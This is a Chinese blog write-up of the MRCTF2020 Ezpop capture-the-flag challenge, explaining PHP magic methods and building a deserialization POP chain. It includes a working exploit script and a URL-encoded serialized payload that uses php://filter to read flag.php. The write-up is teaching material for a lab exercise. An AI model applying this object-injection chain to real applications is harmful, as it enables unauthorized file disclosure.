[MRCTF2020]Ezpop 1 (小白能看懂)

原创 于 2024-12-07 16:44:20 发布 · 721 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#android

题目给出的php代码这里不直接展示完,将屏幕分为两部分对照学习更直接,在代码里面的注释也写了很多函数的作用

看重要的地方,关键代码

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

可以这样理解有没有传入名为pop的参数,如果i没有则创建一个Show类的对象$a,highlight_file()用于显示指定文件的源代码,_FILE_表达的是当前文件。

接下来分析第一段代码:

class Modifier {
    protected  $var;
    public function append($value){
        include($value);
 // include() 简单来说就是读取指定的文件,并在调用的地方插入其内容并执行其中的php代码
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

这里提到了_invoke()魔术方法,记一下,当你调用一个对象时,_invoke()方法会被自动调用

举个例子(并讲解如何使用append方法得到flag.php):

// 创建 Modifier 类的实例
$modifier = new Modifier();

// 设置 var 属性为你希望包含的文件路径
$modifier->var = 'flag.php';  // 假设这个文件存在,并且是有效的 PHP 文件

// 通过调用对象来触发 __invoke() 方法,从而调用 include()
$modifier();  // 实际上会执行 $modifier->__invoke()
              //而_invode()会触发 $this->append($this->var);从而间接使用append()

接着看下一段代码

class Show{
    public $source;
    public $str;
    // __construct当一个对象创建时自动调用,基本上是必定触发的
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }
    // _wakeup() 主要用于在对象反序列化时恢复其状态,简单点说就是当一个对象通过unserialize()
    // 被反序列化时,_wakeup()方法会被自动调用
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

来理解一下_construce()和to_String()

class MyClass {
    public $name;

    public function __construct($name) {
        $this->name = $name;
        echo "Object created with $name\n";
    }

    // 定义 __toString() 方法
    public function __toString() {
        return "Hello, my name is " . $this->name;
    }
}

$obj = new MyClass("John");
// 这里创建了$obj对象时自动调用__construct(),输出Object created with John
echo $obj;  // 这会自动调用 __toString() 方法
// 输入 Hello,my name is John

继续查看下一个代码:

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }
    // 当你访问一个对象的不存在或不可访问的属性时,PHP 会自动调用 __get() 方法。
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

接下来开始推力,当我们传入一个序列化进去,会自动执行_wakeup()函数,它将属性source传入正则匹配函数preg_match(),所以这里source被当作字符串处理。上面有一个_toString():如果对象被当作一个字符串输出时自动调用,它会调用show类中的str属性的属性source,而Test类里有个_get()函数,当对象访问一个不存在的属性时调用,那么假设(this->str)没有source就会调用_get()我们需要找一个没有source的类,而刚好Test类没有,就让(this->str)成为Test的对象,从而使用_get()方法,如果我们将Modifier的对象(p=Modifier的对象)进行构造,那么将会触发_invoke()函数,从而使用append(),include()不会返回值,只有将文件内容读取出来用到伪协议php://filter/convert.base64-encode/resource=flag.php

开始实操

<?php
class Modifier{
    protected  $var = "php://filter/read=convert.base64-encode/resource=flag.php";
}
class Show{
    public $source;
    public $str;
}
class Test{
    public $p;
}
$a = new Show();
$a->source = new Show(); //这里就把$a->source看成一个整体
$a->source->str = new Test(); //这里简单理解就是将show下面的str设置成Test对象,而test类没有source,所以会调用_get();
// 下面就将p = new Modifier();
$a->source->str->p = new Modifier();
echo urlencode(serialize($a));

得到O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D

最后?pop=上面的序列化就可以得到flag.php文件的base64的类容,将内容解码就能得到flag了

借鉴了大佬的文章:

buuctf-[MRCTF2020]Ezpop)(小宇特详解)-CSDN博客

BUUCTF闯关日记--[MRCTF2020]Ezpop1_[mrctf2020]ezpop 1-CSDN博客

saltwy
关注
BUUCTF-[MRCTF2020]Ezpop
qwsn
11-19 2760
0x01、Web 1.BUUCTF-[MRCTF2020]Ezpop 第一步:开启题目环境 图略 第二步:访问链接,发现一段php代码 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%
【buuctf】MRCTF2020-Ezpop小白详解
m0_73860001的博客
03-15 1433
真的很详细
[MRCTF2020]Ezpop 1
plant1234的博客
04-16 1639
[MRCTF2020]Ezpop 1 首先打开题目得到: 对源码进行分析: <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { protected
Buu [MRCTF2020]Ezpop1
Lakers248_的博客
05-08 757
解题思路
BUUCTF [MRCTF2020]Ezpop 1
weixin_45642610的博客
04-21 1569
BUUCTF [MRCTF2020]Ezpop 1 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { pr
[MRCTF2020]Ezpop1
kw741951的博客
08-05 1304
/这里urlencode是为了防止 protected 对象对结果造成影响。调用invoke魔术方法需要将对象当做一个函数来使用,这样invoke方法就会自动调用。,然后成功调用invoke魔术方法就可以读出flag。果我们把modifiy对象的var改为。一看base64编码。
[MRCTF2020]Ezpop-1|php序列化
「 虚幻私塾」
06-30 571
1、打开题目获取到源代码信息,如下: 2、我们的最终目标是获取flag.php中的flag信息,因此分析源代码信息,查看哪里可以获取到flag.php文件,发现在Modifier类中存在include($value),因此想到可以通过php伪协议来获取flag.php的信息,所以现在我们的目的就成了调用append函数,接着往下观察,发现__invoke函数调用了append函数,因此我们只要执行了__invoke函数一样可以获得flag信息,那该怎么执行__invoke函数呢:因此,此时我们应该使用别的函
MRCTF2020」- Ezpop
ro4lsc的博客
05-14 3819
MRCTF2020」- Ezpop 做了一个星期的反序列化,不知道为啥,概念从模糊到清晰再到模糊,看来还是基础不扎实导致的,所以就有了这一篇文章的诞生,思路的一个整理以及POP链的构造需要再熟悉熟悉 俗话说的好,有ez的题目都不ez,那么这个题同样也不ez 重新复习一下php里面反序列化序列化的几大魔术方法 __destruct(类执行完毕以后调用,其最主要的作用是拿来做垃圾回收机制。) __construct(类一执行就开始调用,其作用是拿来初始化一些值。) __toString(在对象当做字符串的
[MRCTF2020]Ezpop 1(代码审计)
weixin_45577185的博客
10-13 447
太绕了,wuwuwu~ Welcome to index.php <?php //flag is in flag.php //提示:flag在flag.php文件内,猜测是当前网站根目录下的flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 /
[MRCTF2020]Ezpop 1——pop链的反序列化
m0_62879498的博客
05-11 2700
[MRCTF2020]Ezpop 1 进入环境,得到源码 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier {
BUUCTF [MRCTF2020]Ezpop1反序列化漏洞 CTF-Web
m0_72904009的博客
06-04 541
BUUCTF [MRCTF2020]Ezpop1反序列化漏洞
BUUCTF闯关日记--[MRCTF2020]Ezpop1
qq_64201116的博客
05-14 741
进入页面,熟悉的代码审计 提示了flag.php <?php class Modifier { protected $var; public function append($value){ include($value); } public function __invoke(){ $this->append($this->var); } } class Show{ public $sourc.
pop链反序列化 [MRCTF2020]Ezpop1
m0_75178803的博客
11-25 1375
当 PHP 反序列化一个对象时,它首先读取对象的类名,并创建一个新的对象。如果属性个数比实际属性个数多,则 PHP 会忽略这些多余的属性,直接将对象反序列化到一个不完整的状态。这是因为反序列化操作本质上是在将一个字符串转换为可执行的代码,因此如果反序列化的对象包含恶意代码,那么它可能会在反序列化过程中执行。如果我们get方法传入一个pop函数,并且用isset函数检查变量是否被设置,是不是值为null,如果存在且不为null,则反序列化我们传入的pop参数。这个语法意味着,如果构造函数没有收到参数,
[MRCTF2020]Ezpop
qq_43801002的博客
05-14 766
题目: Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { protected $var; pub
[mrctf2020]ezpop
最新发布
01-19
### mrctf2020 ezpop CTF Challenge Walkthrough #### Problem Description mrctf2020 ezpop 是一个涉及利用栈溢出漏洞来执行任意代码的CTF挑战。该挑战提供了一个二进制文件,参与者需要找到并利用其中的安全漏洞...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值